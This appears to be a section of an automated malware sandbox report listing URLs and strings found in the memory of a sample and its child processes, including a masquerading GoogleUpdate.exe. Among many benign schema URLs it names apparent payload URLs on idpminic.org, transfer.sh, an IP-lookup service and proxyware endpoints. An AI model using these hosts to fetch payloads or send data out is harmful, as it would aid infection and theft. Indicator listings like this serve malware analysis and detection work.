Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.505118459.0000024E3A241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.570055634.000001CD147D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454709569.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454709569.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Responseon
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454709569.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Responseon
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: vbc.exe, 00000002.00000002.453478134.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4y/
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: vbc.exe, 00000002.00000002.452857823.0000000006C6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.sh
Source: powershell.exe, 0000003D.00000002.587396153.000001CD14D72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: vbc.exe, 00000002.00000002.451663440.0000000006C0B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/dmi1dfg7n.kjylug
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/f429fjd4uf84u.sdfh
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.452036978.0000000006C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/ofg7d45fsdfgg312.sfhg
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org4
Source: vbc.exe, 00000002.00000002.452271185.0000000006C39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.452036978.0000000006C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.orgD8
Source: vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: hZDPlQwZ9D.exe, hZDPlQwZ9D.exe, 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmp, hZDPlQwZ9D.exe, 00000000.00000003.293525865.0000000000702000.00000040.00001000.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: GoogleUpdate.exe, 00000025.00000003.462000222.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.545334289.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.540360749.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.452897537.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.495329979.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.529595020.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.456448693.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.532988714.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.517766096.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.554160649.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.448795988.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.439003252.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.472364104.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.499053995.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.442019252.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.505493357.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.469489871.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/
Source: GoogleUpdate.exe, 00000025.00000003.536031214.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/%Bg
Source: GoogleUpdate.exe, 00000025.00000003.511003595.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/(
Source: GoogleUpdate.exe, 00000025.00000003.554160649.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/0l
Source: GoogleUpdate.exe, 00000025.00000003.490865222.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/6
Source: GoogleUpdate.exe, 00000025.00000003.478619739.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.490865222.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.476024763.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.463712562.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.495329979.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.532988714.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.554160649.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.499053995.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/My
Source: GoogleUpdate.exe, 00000025.00000003.459624370.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.456448693.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/a
Source: GoogleUpdate.exe, 00000025.00000003.478619739.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.487578505.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.511003595.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.536031214.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.548180665.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.490865222.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.450457536.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.476024763.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.526216549.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.459624370.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.463712562.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.466385494.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.462000222.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.545334289.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.540360749.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.452897537.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.495329979.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.529595020.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.456448693.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.532988714.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.517766096.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/get
Source: GoogleUpdate.exe, 00000025.00000003.548180665.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.540360749.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.452897537.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.529595020.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.517766096.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.442019252.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/hy
Source: GoogleUpdate.exe, 00000025.00000003.466385494.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.540360749.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.517766096.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.469489871.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/l
Source: GoogleUpdate.exe, 00000025.00000003.487578505.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.511003595.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.490865222.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.495329979.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.472364104.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.469489871.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/ll
Source: GoogleUpdate.exe, 00000025.00000003.517766096.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.514626224.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/m
Source: GoogleUpdate.exe, 00000025.00000003.505493357.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/oft
Source: GoogleUpdate.exe, 00000025.00000003.466385494.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/r2profit.com/
Source: GoogleUpdate.exe, 00000025.00000003.526216549.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/r2profit.com/hy
Source: vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: powershell.exe, 0000003D.00000002.630160818.000001CD2483C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000003D.00000002.630160818.000001CD2483C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000003D.00000002.630160818.000001CD2483C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: vbc.exe, 00000002.00000003.353833961.0000000007D71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454517081.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355271307.0000000007DF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355355297.0000000007E0D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354438012.0000000007E56000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353730648.0000000007D54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: fl.exe, 0000002B.00000000.421234279.00000000004EF000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: powershell.exe, 0000003D.00000002.587396153.000001CD14D72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000003A.00000002.521348338.0000024E3A44F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.622143246.000001CD160A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000003D.00000002.587396153.000001CD14D72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.630160818.000001CD2483C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
